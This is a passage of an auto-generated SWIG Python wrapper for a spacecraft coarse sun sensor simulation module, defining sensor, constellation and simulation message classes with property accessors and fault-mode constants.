_coarse_sun_sensor.CSSVector_swigregister\nCSSVector_swigregister(CSSVector)\n\nclass SysModel(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SysModel, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SysModel, name)\n __repr__ = _swig_repr\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_SysModel(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_SysModel\n __del__ = lambda self: None\n\n def SelfInit(self):\n return _coarse_sun_sensor.SysModel_SelfInit(self)\n\n def CrossInit(self):\n return _coarse_sun_sensor.SysModel_CrossInit(self)\n\n def IntegratedInit(self):\n return _coarse_sun_sensor.SysModel_IntegratedInit(self)\n\n def UpdateState(self, CurrentSimNanos):\n return _coarse_sun_sensor.SysModel_UpdateState(self, CurrentSimNanos)\n\n def Reset(self, CurrentSimNanos):\n return _coarse_sun_sensor.SysModel_Reset(self, CurrentSimNanos)\n __swig_setmethods__[\"ModelTag\"] = _coarse_sun_sensor.SysModel_ModelTag_set\n __swig_getmethods__[\"ModelTag\"] = _coarse_sun_sensor.SysModel_ModelTag_get\n if _newclass:\n ModelTag = _swig_property(_coarse_sun_sensor.SysModel_ModelTag_get, _coarse_sun_sensor.SysModel_ModelTag_set)\n __swig_setmethods__[\"CallCounts\"] = _coarse_sun_sensor.SysModel_CallCounts_set\n __swig_getmethods__[\"CallCounts\"] = _coarse_sun_sensor.SysModel_CallCounts_get\n if _newclass:\n CallCounts = _swig_property(_coarse_sun_sensor.SysModel_CallCounts_get, _coarse_sun_sensor.SysModel_CallCounts_set)\n __swig_setmethods__[\"RNGSeed\"] = _coarse_sun_sensor.SysModel_RNGSeed_set\n __swig_getmethods__[\"RNGSeed\"] = _coarse_sun_sensor.SysModel_RNGSeed_get\n if _newclass:\n RNGSeed = _swig_property(_coarse_sun_sensor.SysModel_RNGSeed_get, _coarse_sun_sensor.SysModel_RNGSeed_set)\n __swig_setmethods__[\"moduleID\"] = _coarse_sun_sensor.SysModel_moduleID_set\n __swig_getmethods__[\"moduleID\"] = _coarse_sun_sensor.SysModel_moduleID_get\n if _newclass:\n moduleID = _swig_property(_coarse_sun_sensor.SysModel_moduleID_get, _coarse_sun_sensor.SysModel_moduleID_set)\nSysModel_swigregister = _coarse_sun_sensor.SysModel_swigregister\nSysModel_swigregister(SysModel)\n\nCSSFAULT_OFF = _coarse_sun_sensor.CSSFAULT_OFF\nCSSFAULT_STUCK_CURRENT = _coarse_sun_sensor.CSSFAULT_STUCK_CURRENT\nCSSFAULT_STUCK_MAX = _coarse_sun_sensor.CSSFAULT_STUCK_MAX\nCSSFAULT_STUCK_RAND = _coarse_sun_sensor.CSSFAULT_STUCK_RAND\nCSSFAULT_STUCK = _coarse_sun_sensor.CSSFAULT_STUCK\nCSSFAULT_RAND = _coarse_sun_sensor.CSSFAULT_RAND\nMAX_CSSFAULT = _coarse_sun_sensor.MAX_CSSFAULT\nclass CoarseSunSensor(SysModel):\n __swig_setmethods__ = {}\n for _s in [SysModel]:\n __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))\n __setattr__ = lambda self, name, value: _swig_setattr(self, CoarseSunSensor, name, value)\n __swig_getmethods__ = {}\n for _s in [SysModel]:\n __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))\n __getattr__ = lambda self, name: _swig_getattr(self, CoarseSunSensor, name)\n __repr__ = _swig_repr\n __swig_destroy__ = _coarse_sun_sensor.delete_CoarseSunSensor\n __del__ = lambda self: None\n\n def CrossInit(self):\n return _coarse_sun_sensor.CoarseSunSensor_CrossInit(self)\n\n def SelfInit(self):\n return _coarse_sun_sensor.CoarseSunSensor_SelfInit(self)\n\n def UpdateState(self, CurrentSimNanos):\n return _coarse_sun_sensor.CoarseSunSensor_UpdateState(self, CurrentSimNanos)\n\n def setUnitDirectionVectorWithPerturbation(self, cssThetaPerturb, cssPhiPerturb):\n return _coarse_sun_sensor.CoarseSunSensor_setUnitDirectionVectorWithPerturbation(self, cssThetaPerturb, cssPhiPerturb)\n\n def setBodyToPlatformDCM(self, yaw, pitch, roll):\n return _coarse_sun_sensor.CoarseSunSensor_setBodyToPlatformDCM(self, yaw, pitch, roll)\n\n def readInputMessages(self):\n return _coarse_sun_sensor.CoarseSunSensor_readInputMessages(self)\n\n def computeSunData(self):\n return _coarse_sun_sensor.CoarseSunSensor_computeSunData(self)\n\n def computeTrueOutput(self):\n return _coarse_sun_sensor.CoarseSunSensor_computeTrueOutput(self)\n\n def applySensorErrors(self):\n return _coarse_sun_sensor.CoarseSunSensor_applySensorErrors(self)\n\n def scaleSensorValues(self):\n return _coarse_sun_sensor.CoarseSunSensor_scaleSensorValues(self)\n\n def applySaturation(self):\n return _coarse_sun_sensor.CoarseSunSensor_applySaturation(self)\n\n def writeOutputMessages(self, Clock):\n return _coarse_sun_sensor.CoarseSunSensor_writeOutputMessages(self, Clock)\n __swig_setmethods__[\"sunInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunInMsgName_set\n __swig_getmethods__[\"sunInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunInMsgName_get\n if _newclass:\n sunInMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sunInMsgName_get, _coarse_sun_sensor.CoarseSunSensor_sunInMsgName_set)\n __swig_setmethods__[\"stateInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_stateInMsgName_set\n __swig_getmethods__[\"stateInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_stateInMsgName_get\n if _newclass:\n stateInMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_stateInMsgName_get, _coarse_sun_sensor.CoarseSunSensor_stateInMsgName_set)\n __swig_setmethods__[\"cssDataOutMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_set\n __swig_getmethods__[\"cssDataOutMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_get\n if _newclass:\n cssDataOutMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_get, _coarse_sun_sensor.CoarseSunSensor_cssDataOutMsgName_set)\n __swig_setmethods__[\"sunEclipseInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_set\n __swig_getmethods__[\"sunEclipseInMsgName\"] = _coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_get\n if _newclass:\n sunEclipseInMsgName = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_get, _coarse_sun_sensor.CoarseSunSensor_sunEclipseInMsgName_set)\n __swig_setmethods__[\"faultState\"] = _coarse_sun_sensor.CoarseSunSensor_faultState_set\n __swig_getmethods__[\"faultState\"] = _coarse_sun_sensor.CoarseSunSensor_faultState_get\n if _newclass:\n faultState = _swig_property(_coarse_sun_sensor.CoarseSunSensor_faultState_get, _coarse_sun_sensor.CoarseSunSensor_faultState_set)\n __swig_setmethods__[\"theta\"] = _coarse_sun_sensor.CoarseSunSensor_theta_set\n __swig_getmethods__[\"theta\"] = _coarse_sun_sensor.CoarseSunSensor_theta_get\n if _newclass:\n theta = _swig_property(_coarse_sun_sensor.CoarseSunSensor_theta_get, _coarse_sun_sensor.CoarseSunSensor_theta_set)\n __swig_setmethods__[\"phi\"] = _coarse_sun_sensor.CoarseSunSensor_phi_set\n __swig_getmethods__[\"phi\"] = _coarse_sun_sensor.CoarseSunSensor_phi_get\n if _newclass:\n phi = _swig_property(_coarse_sun_sensor.CoarseSunSensor_phi_get, _coarse_sun_sensor.CoarseSunSensor_phi_set)\n __swig_setmethods__[\"B2P321Angles\"] = _coarse_sun_sensor.CoarseSunSensor_B2P321Angles_set\n __swig_getmethods__[\"B2P321Angles\"] = _coarse_sun_sensor.CoarseSunSensor_B2P321Angles_get\n if _newclass:\n B2P321Angles = _swig_property(_coarse_sun_sensor.CoarseSunSensor_B2P321Angles_get, _coarse_sun_sensor.CoarseSunSensor_B2P321Angles_set)\n __swig_setmethods__[\"dcm_PB\"] = _coarse_sun_sensor.CoarseSunSensor_dcm_PB_set\n __swig_getmethods__[\"dcm_PB\"] = _coarse_sun_sensor.CoarseSunSensor_dcm_PB_get\n if _newclass:\n dcm_PB = _swig_property(_coarse_sun_sensor.CoarseSunSensor_dcm_PB_get, _coarse_sun_sensor.CoarseSunSensor_dcm_PB_set)\n __swig_setmethods__[\"nHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_nHat_B_set\n __swig_getmethods__[\"nHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_nHat_B_get\n if _newclass:\n nHat_B = _swig_property(_coarse_sun_sensor.CoarseSunSensor_nHat_B_get, _coarse_sun_sensor.CoarseSunSensor_nHat_B_set)\n __swig_setmethods__[\"sHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_sHat_B_set\n __swig_getmethods__[\"sHat_B\"] = _coarse_sun_sensor.CoarseSunSensor_sHat_B_get\n if _newclass:\n sHat_B = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sHat_B_get, _coarse_sun_sensor.CoarseSunSensor_sHat_B_set)\n __swig_setmethods__[\"directValue\"] = _coarse_sun_sensor.CoarseSunSensor_directValue_set\n __swig_getmethods__[\"directValue\"] = _coarse_sun_sensor.CoarseSunSensor_directValue_get\n if _newclass:\n directValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_directValue_get, _coarse_sun_sensor.CoarseSunSensor_directValue_set)\n __swig_setmethods__[\"albedoValue\"] = _coarse_sun_sensor.CoarseSunSensor_albedoValue_set\n __swig_getmethods__[\"albedoValue\"] = _coarse_sun_sensor.CoarseSunSensor_albedoValue_get\n if _newclass:\n albedoValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_albedoValue_get, _coarse_sun_sensor.CoarseSunSensor_albedoValue_set)\n __swig_setmethods__[\"scaleFactor\"] = _coarse_sun_sensor.CoarseSunSensor_scaleFactor_set\n __swig_getmethods__[\"scaleFactor\"] = _coarse_sun_sensor.CoarseSunSensor_scaleFactor_get\n if _newclass:\n scaleFactor = _swig_property(_coarse_sun_sensor.CoarseSunSensor_scaleFactor_get, _coarse_sun_sensor.CoarseSunSensor_scaleFactor_set)\n __swig_setmethods__[\"sensedValue\"] = _coarse_sun_sensor.CoarseSunSensor_sensedValue_set\n __swig_getmethods__[\"sensedValue\"] = _coarse_sun_sensor.CoarseSunSensor_sensedValue_get\n if _newclass:\n sensedValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sensedValue_get, _coarse_sun_sensor.CoarseSunSensor_sensedValue_set)\n __swig_setmethods__[\"trueValue\"] = _coarse_sun_sensor.CoarseSunSensor_trueValue_set\n __swig_getmethods__[\"trueValue\"] = _coarse_sun_sensor.CoarseSunSensor_trueValue_get\n if _newclass:\n trueValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_trueValue_get, _coarse_sun_sensor.CoarseSunSensor_trueValue_set)\n __swig_setmethods__[\"kellyFactor\"] = _coarse_sun_sensor.CoarseSunSensor_kellyFactor_set\n __swig_getmethods__[\"kellyFactor\"] = _coarse_sun_sensor.CoarseSunSensor_kellyFactor_get\n if _newclass:\n kellyFactor = _swig_property(_coarse_sun_sensor.CoarseSunSensor_kellyFactor_get, _coarse_sun_sensor.CoarseSunSensor_kellyFactor_set)\n __swig_setmethods__[\"fov\"] = _coarse_sun_sensor.CoarseSunSensor_fov_set\n __swig_getmethods__[\"fov\"] = _coarse_sun_sensor.CoarseSunSensor_fov_get\n if _newclass:\n fov = _swig_property(_coarse_sun_sensor.CoarseSunSensor_fov_get, _coarse_sun_sensor.CoarseSunSensor_fov_set)\n __swig_setmethods__[\"r_B\"] = _coarse_sun_sensor.CoarseSunSensor_r_B_set\n __swig_getmethods__[\"r_B\"] = _coarse_sun_sensor.CoarseSunSensor_r_B_get\n if _newclass:\n r_B = _swig_property(_coarse_sun_sensor.CoarseSunSensor_r_B_get, _coarse_sun_sensor.CoarseSunSensor_r_B_set)\n __swig_setmethods__[\"senBias\"] = _coarse_sun_sensor.CoarseSunSensor_senBias_set\n __swig_getmethods__[\"senBias\"] = _coarse_sun_sensor.CoarseSunSensor_senBias_get\n if _newclass:\n senBias = _swig_property(_coarse_sun_sensor.CoarseSunSensor_senBias_get, _coarse_sun_sensor.CoarseSunSensor_senBias_set)\n __swig_setmethods__[\"senNoiseStd\"] = _coarse_sun_sensor.CoarseSunSensor_senNoiseStd_set\n __swig_getmethods__[\"senNoiseStd\"] = _coarse_sun_sensor.CoarseSunSensor_senNoiseStd_get\n if _newclass:\n senNoiseStd = _swig_property(_coarse_sun_sensor.CoarseSunSensor_senNoiseStd_get, _coarse_sun_sensor.CoarseSunSensor_senNoiseStd_set)\n __swig_setmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CoarseSunSensor_outputBufferCount_set\n __swig_getmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CoarseSunSensor_outputBufferCount_get\n if _newclass:\n outputBufferCount = _swig_property(_coarse_sun_sensor.CoarseSunSensor_outputBufferCount_get, _coarse_sun_sensor.CoarseSunSensor_outputBufferCount_set)\n __swig_setmethods__[\"maxOutput\"] = _coarse_sun_sensor.CoarseSunSensor_maxOutput_set\n __swig_getmethods__[\"maxOutput\"] = _coarse_sun_sensor.CoarseSunSensor_maxOutput_get\n if _newclass:\n maxOutput = _swig_property(_coarse_sun_sensor.CoarseSunSensor_maxOutput_get, _coarse_sun_sensor.CoarseSunSensor_maxOutput_set)\n __swig_setmethods__[\"minOutput\"] = _coarse_sun_sensor.CoarseSunSensor_minOutput_set\n __swig_getmethods__[\"minOutput\"] = _coarse_sun_sensor.CoarseSunSensor_minOutput_get\n if _newclass:\n minOutput = _swig_property(_coarse_sun_sensor.CoarseSunSensor_minOutput_get, _coarse_sun_sensor.CoarseSunSensor_minOutput_set)\n __swig_setmethods__[\"walkBounds\"] = _coarse_sun_sensor.CoarseSunSensor_walkBounds_set\n __swig_getmethods__[\"walkBounds\"] = _coarse_sun_sensor.CoarseSunSensor_walkBounds_get\n if _newclass:\n walkBounds = _swig_property(_coarse_sun_sensor.CoarseSunSensor_walkBounds_get, _coarse_sun_sensor.CoarseSunSensor_walkBounds_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CoarseSunSensor(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\nCoarseSunSensor_swigregister = _coarse_sun_sensor.CoarseSunSensor_swigregister\nCoarseSunSensor_swigregister(CoarseSunSensor)\n\nclass CSSConstellation(SysModel):\n __swig_setmethods__ = {}\n for _s in [SysModel]:\n __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSConstellation, name, value)\n __swig_getmethods__ = {}\n for _s in [SysModel]:\n __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))\n __getattr__ = lambda self, name: _swig_getattr(self, CSSConstellation, name)\n __repr__ = _swig_repr\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSConstellation\n __del__ = lambda self: None\n\n def CrossInit(self):\n return _coarse_sun_sensor.CSSConstellation_CrossInit(self)\n\n def SelfInit(self):\n return _coarse_sun_sensor.CSSConstellation_SelfInit(self)\n\n def UpdateState(self, CurrentSimNanos):\n return _coarse_sun_sensor.CSSConstellation_UpdateState(self, CurrentSimNanos)\n\n def appendCSS(self, newSensor):\n return _coarse_sun_sensor.CSSConstellation_appendCSS(self, newSensor)\n __swig_setmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CSSConstellation_outputBufferCount_set\n __swig_getmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CSSConstellation_outputBufferCount_get\n if _newclass:\n outputBufferCount = _swig_property(_coarse_sun_sensor.CSSConstellation_outputBufferCount_get, _coarse_sun_sensor.CSSConstellation_outputBufferCount_set)\n __swig_setmethods__[\"outputConstellationMessage\"] = _coarse_sun_sensor.CSSConstellation_outputConstellationMessage_set\n __swig_getmethods__[\"outputConstellationMessage\"] = _coarse_sun_sensor.CSSConstellation_outputConstellationMessage_get\n if _newclass:\n outputConstellationMessage = _swig_property(_coarse_sun_sensor.CSSConstellation_outputConstellationMessage_get, _coarse_sun_sensor.CSSConstellation_outputConstellationMessage_set)\n __swig_setmethods__[\"outputConstID\"] = _coarse_sun_sensor.CSSConstellation_outputConstID_set\n __swig_getmethods__[\"outputConstID\"] = _coarse_sun_sensor.CSSConstellation_outputConstID_get\n if _newclass:\n outputConstID = _swig_property(_coarse_sun_sensor.CSSConstellation_outputConstID_get, _coarse_sun_sensor.CSSConstellation_outputConstID_set)\n __swig_setmethods__[\"sensorList\"] = _coarse_sun_sensor.CSSConstellation_sensorList_set\n __swig_getmethods__[\"sensorList\"] = _coarse_sun_sensor.CSSConstellation_sensorList_get\n if _newclass:\n sensorList = _swig_property(_coarse_sun_sensor.CSSConstellation_sensorList_get, _coarse_sun_sensor.CSSConstellation_sensorList_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSConstellation(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\nCSSConstellation_swigregister = _coarse_sun_sensor.CSSConstellation_swigregister\nCSSConstellation_swigregister(CSSConstellation)\n\nclass SCPlusStatesSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SCPlusStatesSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SCPlusStatesSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"r_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_set\n __swig_getmethods__[\"r_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_get\n if _newclass:\n r_BN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_set)\n __swig_setmethods__[\"v_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_set\n __swig_getmethods__[\"v_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_get\n if _newclass:\n v_BN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_set)\n __swig_setmethods__[\"r_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_set\n __swig_getmethods__[\"r_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_get\n if _newclass:\n r_CN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_set)\n __swig_setmethods__[\"v_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_set\n __swig_getmethods__[\"v_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_get\n if _newclass:\n v_CN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_set)\n __swig_setmethods__[\"sigma_BN\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_set\n __swig_getmethods__[\"sigma_BN\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_get\n if _newclass:\n sigma_BN = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_get, _coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_set)\n __swig_setmethods__[\"omega_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_set\n __swig_getmethods__[\"omega_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_get\n if _newclass:\n omega_BN_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_set)\n __swig_setmethods__[\"omegaDot_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_set\n __swig_getmethods__[\"omegaDot_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_get\n if _newclass:\n omegaDot_BN_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_set)\n __swig_setmethods__[\"TotalAccumDVBdy\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_set\n __swig_getmethods__[\"TotalAccumDVBdy\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_get\n if _newclass:\n TotalAccumDVBdy = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_get, _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_set)\n __swig_setmethods__[\"TotalAccumDV_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_set\n __swig_getmethods__[\"TotalAccumDV_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_get\n if _newclass:\n TotalAccumDV_BN_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_set)\n __swig_setmethods__[\"nonConservativeAccelpntB_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_set\n __swig_getmethods__[\"nonConservativeAccelpntB_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_get\n if _newclass:\n nonConservativeAccelpntB_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_set)\n __swig_setmethods__[\"MRPSwitchCount\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_set\n __swig_getmethods__[\"MRPSwitchCount\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_get\n if _newclass:\n MRPSwitchCount = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_get, _coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_SCPlusStatesSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_SCPlusStatesSimMsg\n __del__ = lambda self: None\nSCPlusStatesSimMsg_swigregister = _coarse_sun_sensor.SCPlusStatesSimMsg_swigregister\nSCPlusStatesSimMsg_swigregister(SCPlusStatesSimMsg)\n\nMAX_BODY_NAME_LENGTH = _coarse_sun_sensor.MAX_BODY_NAME_LENGTH\nclass SpicePlanetStateSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SpicePlanetStateSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SpicePlanetStateSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"J2000Current\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_set\n __swig_getmethods__[\"J2000Current\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_get\n if _newclass:\n J2000Current = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_set)\n __swig_setmethods__[\"PositionVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_set\n __swig_getmethods__[\"PositionVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_get\n if _newclass:\n PositionVector = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_set)\n __swig_setmethods__[\"VelocityVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_set\n __swig_getmethods__[\"VelocityVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_get\n if _newclass:\n VelocityVector = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_set)\n __swig_setmethods__[\"J20002Pfix\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_set\n __swig_getmethods__[\"J20002Pfix\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_get\n if _newclass:\n J20002Pfix = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_set)\n __swig_setmethods__[\"J20002Pfix_dot\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_set\n __swig_getmethods__[\"J20002Pfix_dot\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_get\n if _newclass:\n J20002Pfix_dot = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_set)\n __swig_setmethods__[\"computeOrient\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_set\n __swig_getmethods__[\"computeOrient\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_get\n if _newclass:\n computeOrient = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_set)\n __swig_setmethods__[\"PlanetName\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_set\n __swig_getmethods__[\"PlanetName\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_get\n if _newclass:\n PlanetName = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_SpicePlanetStateSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_SpicePlanetStateSimMsg\n __del__ = lambda self: None\nSpicePlanetStateSimMsg_swigregister = _coarse_sun_sensor.SpicePlanetStateSimMsg_swigregister\nSpicePlanetStateSimMsg_swigregister(SpicePlanetStateSimMsg)\n\nclass CSSRawDataSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSRawDataSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, CSSRawDataSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"OutputData\"] = _coarse_sun_sensor.CSSRawDataSimMsg_OutputData_set\n __swig_getmethods__[\"OutputData\"] = _coarse_sun_sensor.CSSRawDataSimMsg_OutputData_get\n if _newclass:\n OutputData = _swig_property(_coarse_sun_sensor.CSSRawDataSimMsg_OutputData_get, _coarse_sun_sensor.CSSRawDataSimMsg_OutputData_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSRawDataSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSRawDataSimMsg\n __del__ = lambda self: None\nCSSRawDataSimMsg_swigregister = _coarse_sun_sensor.CSSRawDataSimMsg_swigregister\nCSSRawDataSimMsg_swigregister(CSSRawDataSimMsg)\n\nclass EclipseSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, EclipseSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, EclipseSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"shadowFactor\"] = _coarse_sun_sensor.EclipseSimMsg_shadowFactor_set\n __swig_getmethods__[\"shadowFactor\"] = _coarse_sun_sensor.EclipseSimMsg_shadowFactor_get\n if _newclass:\n shadowFactor = _swig_property(_coarse_sun_sensor.EclipseSimMsg_shadowFactor_get, _coarse_sun_sensor.EclipseSimMsg_shadowFactor_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_EclipseSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_EclipseSimMsg\n __del__ = lambda self: None\nEclipseSimMsg_swigregister = _coarse_sun_sensor.EclipseSimMsg_swigregister\nEclipseSimMsg_swigregister(EclipseSimMsg)\n\nclass CSSArraySensorIntMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSArraySensorIntMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, CSSArraySensorIntMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"CosValue\"] = _coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_set\n __swig_getmethods__[\"CosValue\"] = _coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_get\n if _newclass:\n CosValue = _swig_property(_coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_get, _coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_set)\n\n def 